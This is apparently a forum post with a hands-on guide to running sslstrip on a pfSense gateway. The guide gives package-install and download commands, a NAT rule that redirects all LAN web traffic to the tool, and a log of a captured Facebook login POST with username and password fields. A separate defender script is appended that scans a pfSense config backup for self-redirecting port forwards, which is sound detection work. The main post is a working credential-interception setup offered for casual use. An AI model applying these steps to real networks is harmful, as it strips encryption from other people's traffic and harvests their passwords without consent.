Running SSLSTRIP on a pfSense box



  • Hi all, this is my first post here.

    I consider myself to be a total noob when it comes to pfSense or FreeBSD. However, I was looking into MITM-type attacks for fun and wondered if it would be possible to run sslstrip on the gateway itself, so as to automatically process all traffic without the need for ARP poisoning. I searched the web but couldn't find any info on how to do this, but I got it working on my own and thought I would share my experience here.

    I don't know exactly where to put this so I chose the general forum. Mods feel free to move it to a more appropriate location.

    First, we need to add a couple of packages to the box so SSLstrip can actually run:

    pkg_add -r ftp://ftp-archive.freebsd.org/pub/FreeBSD-Archive/ports/i386/packages-8.1-release/python/py26-twistedWeb-9.0.0.tbz
    

    This installs the Python Twisted Web module, which is needed for sslstrip functionality. As a bonus, Python itself gets installed automatically as a dependency.

    pkg_add -r ftp://ftp-archive.freebsd.org/pub/FreeBSD-Archive/ports/i386/packages-8.1-release/python/py26-openssl-0.10.tbz
    

    The OpenSSL Python module is also needed for sslstrip; I couldn't start sslstrip without it.

    pkg_add -r ftp://ftp-archive.freebsd.org/pub/FreeBSD-Archive/ports/i386/packages-8.1-release/ftp/wget-1.12_1.tbz
    

    Installing wget ensures an easy method of getting the sslstrip tar file on your box.

    rehash
    

    Don't know what this is for, but I read online that you need to do this after installing packages.

    cd
    

    Let's run everything from the root home dir…

    wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
    

    Download the sslstrip files.

    tar zxvf sslstrip-0.9.tar.gz
    

    Extract the files to the ~/sslstrip-0.9 directory.

    cd sslstrip-0.9
    

    Change to the extracted directory.

    python setup.py install
    

    Install the sslstrip files to the system.

    So now you can try whether it works:

    /usr/local/bin/sslstrip -h
    

    You should get something like this:

    [2.0.2-RC3][root@pfsense.localdomain]/root(2): /usr/local/bin/sslstrip -h
    
    sslstrip 0.9 by Moxie Marlinspike
    Usage: sslstrip <options>
    
    Options:
    -w <filename>, --write=<filename> Specify file to log to (optional).
    -p , --post                       Log only SSL POSTs. (default)
    -s , --ssl                        Log all SSL traffic to and from server.
    -a , --all                        Log all SSL and HTTP traffic to and from server.
    -l <port>, --listen=<port>        Port to listen on (default 10000).
    -f , --favicon                    Substitute a lock favicon on secure requests.
    -k , --killsessions               Kill sessions in progress.
    -h                                Print this help message.
    
    [2.0.2-RC3][root@pfsense.localdomain]/root(3):
    

    Now, we need to create a NAT rule to forward all TCP port 80 traffic to the port on which sslstrip listens. This is port 10000 by default.

    Go to Firewall/NAT and create a new rule. Source address=LAN Net, proto=tcp, dest ports=80, NAT IP=<ip address of your box>, NAT ports=10000. A firewall rule should be created automatically for you to open port 10000.

    Now, in an SSH shell, run

    /usr/local/bin/sslstrip &
    

    This ensures sslstrip remains active even if you close the ssh session.

    Now a logfile called sslstrip.log is created in root's home dir, which should contain passwords.

    Output of the file looks like so:

    [2.0.2-RC3][root@pfsense.localdomain]/root(9): cat sslstrip.log
    2012-07-03 21:49:49,290 POST Data (www.facebook.com):
    lsd=AVpQRVOK&return_session=0&legacy_return=1&display=&session_key_only=0&trynum=2&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&timezone=-120&lgnrnd=124859_hr3C&lgnjs=n&email=testing&pass=testing123&default_persistent=0&login=Log+In
    [2.0.2-RC3][root@pfsense.localdomain]/root(10):
    

    You can see I entered testing as a username and testing123 as a password.

    That's all now. Please use this in an ethically responsible way.
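As an added defender-side check (not part of the post above): the one configuration step that gives the setup away is a port-forward that sends LAN web traffic back to the firewall's own address on a different port. The script below parses a pfSense config.xml backup and flags such self-redirecting rules; the element names used (`<nat><rule>`, `<target>`, `<local-port>`, `<interfaces>/<lan>/<ipaddr>`) are assumed from pfSense 2.x exports and the sample config is constructed for the example.

```python
import xml.etree.ElementTree as ET

# Constructed sample of a pfSense config.xml backup (trimmed to the parts
# the check needs). Element names are assumed from pfSense 2.x exports;
# adjust the paths below if your version's layout differs.
SAMPLE_CONFIG = """<pfsense>
  <interfaces>
    <wan><ipaddr>dhcp</ipaddr></wan>
    <lan><ipaddr>192.168.1.1</ipaddr></lan>
  </interfaces>
  <nat>
    <rule>
      <interface>lan</interface><protocol>tcp</protocol>
      <source><network>lan</network></source>
      <destination><any/><port>80</port></destination>
      <target>192.168.1.1</target><local-port>10000</local-port>
      <descr>sslstrip</descr>
    </rule>
    <rule>
      <interface>wan</interface><protocol>tcp</protocol>
      <source><any/></source>
      <destination><network>wanip</network><port>443</port></destination>
      <target>192.168.1.50</target><local-port>443</local-port>
      <descr>web server</descr>
    </rule>
  </nat>
</pfsense>"""

WEB_PORTS = {"80", "443"}


def firewall_addresses(root):
    """Collect every address the firewall itself is configured with."""
    return {e.text.strip() for e in root.iter("ipaddr") if e.text}


def find_self_redirects(config_xml):
    """Return (interface, dest_port, target, local_port, descr) for each
    port-forward that redirects web traffic to the firewall's own address
    on a different port, i.e. the pattern an interception proxy needs."""
    root = ET.fromstring(config_xml)
    own = firewall_addresses(root)
    hits = []
    for rule in root.findall("./nat/rule"):
        dport = rule.findtext("destination/port", "")
        target = rule.findtext("target", "")
        lport = rule.findtext("local-port", "")
        if dport in WEB_PORTS and target in own and lport != dport:
            hits.append((rule.findtext("interface", ""), dport, target,
                         lport, rule.findtext("descr", "")))
    return hits


if __name__ == "__main__":
    for hit in find_self_redirects(SAMPLE_CONFIG):
        print("suspicious port forward:", hit)
```

A legitimate local proxy package (for example a transparent web proxy on the firewall) produces the same rule shape, so treat hits as items to review against change records rather than as proof of tampering.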

